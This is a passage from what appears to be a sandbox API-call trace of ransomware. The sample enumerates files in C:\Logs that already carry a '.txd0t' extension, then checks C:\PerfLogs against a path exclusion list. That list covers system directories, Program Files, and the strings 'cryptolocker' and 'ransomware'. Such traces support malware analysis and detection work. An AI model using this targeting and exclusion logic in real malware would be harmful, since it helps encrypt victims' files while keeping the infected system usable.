returned=".txd0t" [0119.102] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.102] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a740b53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", cAlternateFileName="MIF620~1.TXD")) returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", psz2=".") returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", psz2="..") returned 1 [0119.102] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.102] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.102] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t" [0119.102] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4DeviceInstall.evtx.txd0t") returned=".txd0t" [0119.102] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.102] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a740b53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", cAlternateFileName="MIAC2C~1.TXD")) returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.102] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.102] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.102] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.102] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t" [0119.102] PathFindExtensionW (pszPath="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t") returned=".txd0t" [0119.102] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.102] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a871d72, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", cAlternateFileName="MI97D5~1.TXD")) returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.103] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.103] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.103] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t" [0119.103] PathFindExtensionW (pszPath="Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t") returned=".txd0t" [0119.103] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.103] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a78cf09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", cAlternateFileName="MI84B2~1.TXD")) returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.103] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.103] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.103] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t" [0119.103] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4Operational.evtx.txd0t") returned=".txd0t" [0119.103] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.103] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a78cf09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", cAlternateFileName="MI6769~1.TXD")) returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", psz2=".") returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", psz2="..") returned 1 [0119.103] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.103] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.103] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t" [0119.103] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t") returned=".txd0t" [0119.103] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.103] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a8259fd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", cAlternateFileName="MI7EF2~1.TXD")) returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", psz2=".") returned 1 [0119.103] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", psz2="..") returned 1 [0119.103] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.103] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.103] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t" [0119.103] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.txd0t") returned=".txd0t" [0119.103] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.103] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5abdf31c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", cAlternateFileName="MI58B6~1.TXD")) returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", psz2=".") returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", psz2="..") returned 1 [0119.104] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.104] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.104] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t" [0119.104] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t") returned=".txd0t" [0119.104] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.104] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5abdf31c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", cAlternateFileName="MIA157~1.TXD")) returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", psz2=".") returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", psz2="..") returned 1 [0119.104] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.104] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.104] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t" [0119.104] PathFindExtensionW (pszPath="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t") returned=".txd0t" [0119.104] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.104] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a871d72, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", cAlternateFileName="MIBAE9~1.TXD")) returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.104] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.104] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.104] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx.txd0t" [0119.104] PathFindExtensionW (pszPath="Microsoft-Windows-Winlogon%4Operational.evtx.txd0t") returned=".txd0t" [0119.104] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.104] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5acc9565, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", cAlternateFileName="MI1EF7~1.TXD")) returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.104] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.104] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.104] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.104] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t" [0119.104] PathFindExtensionW (pszPath="Microsoft-Windows-WMI-Activity%4Operational.evtx.txd0t") returned=".txd0t" [0119.104] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.104] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a956f95, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x111200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Security.evtx.txd0t", cAlternateFileName="SECURI~1.TXD")) returned 1 [0119.104] StrCmpW (psz1="Security.evtx.txd0t", psz2=".") returned 1 [0119.104] StrCmpW (psz1="Security.evtx.txd0t", psz2="..") returned 1 [0119.104] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.104] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.105] StrNCatW (in: psz1="C:\\Logs\\", psz2="Security.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Security.evtx.txd0t") returned="C:\\Logs\\Security.evtx.txd0t" [0119.105] PathFindExtensionW (pszPath="Security.evtx.txd0t") returned=".txd0t" [0119.105] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.105] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a97ce4f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Setup.evtx.txd0t", cAlternateFileName="SETUPE~1.TXD")) returned 1 [0119.105] StrCmpW (psz1="Setup.evtx.txd0t", psz2=".") returned 1 [0119.105] StrCmpW (psz1="Setup.evtx.txd0t", psz2="..") returned 1 [0119.105] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.105] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.105] StrNCatW (in: psz1="C:\\Logs\\", psz2="Setup.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Setup.evtx.txd0t") returned="C:\\Logs\\Setup.evtx.txd0t" [0119.105] PathFindExtensionW (pszPath="Setup.evtx.txd0t") returned=".txd0t" [0119.105] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.105] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a9ef500, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x111200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="System.evtx.txd0t", cAlternateFileName="SYSTEM~1.TXD")) returned 1 [0119.105] StrCmpW (psz1="System.evtx.txd0t", psz2=".") returned 1 [0119.105] StrCmpW (psz1="System.evtx.txd0t", psz2="..") returned 1 [0119.105] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.105] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.105] StrNCatW (in: psz1="C:\\Logs\\", psz2="System.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\System.evtx.txd0t") returned="C:\\Logs\\System.evtx.txd0t" [0119.105] PathFindExtensionW (pszPath="System.evtx.txd0t") returned=".txd0t" [0119.105] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.105] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5aaae102, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx.txd0t", cAlternateFileName="WINDOW~1.TXD")) returned 1 [0119.105] StrCmpW (psz1="Windows PowerShell.evtx.txd0t", psz2=".") returned 1 [0119.105] StrCmpW (psz1="Windows PowerShell.evtx.txd0t", psz2="..") returned 1 [0119.105] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.105] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.105] StrNCatW (in: psz1="C:\\Logs\\", psz2="Windows PowerShell.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Windows PowerShell.evtx.txd0t") returned="C:\\Logs\\Windows PowerShell.evtx.txd0t" [0119.105] PathFindExtensionW (pszPath="Windows PowerShell.evtx.txd0t") returned=".txd0t" [0119.105] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.105] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5aaae102, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx.txd0t", cAlternateFileName="WINDOW~1.TXD")) returned 0 [0119.105] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0119.105] GetProcessHeap () returned 0xe30000 [0119.105] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0119.106] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xaced8ceb, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0119.106] StrCmpW (psz1="pagefile.sys", psz2=".") returned 1 [0119.106] StrCmpW (psz1="pagefile.sys", psz2="..") returned 1 [0119.106] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0119.106] StrCmpW (psz1="PerfLogs", psz2=".") returned 1 [0119.106] StrCmpW (psz1="PerfLogs", psz2="..") returned 1 [0119.106] StrCpyNW (in: psz1=0xee8818, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0119.106] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0119.106] StrNCatW (in: psz1="C:\\", psz2="PerfLogs", cchMax=1030 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system32\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\local\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\boot\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\perflogs\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\programdata\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\drivers\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\wsus\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="crypt_detect") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="cryptolocker") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="ransomware") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\WINDOWS") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.106] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files") returned 0x0 [0119.106] GetProcessHeap () returned 0xe30000 [0119.106] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x498) returned 0xf0daf8 [0119.106] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\PerfLogs", cchMax=1048 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0119.107] 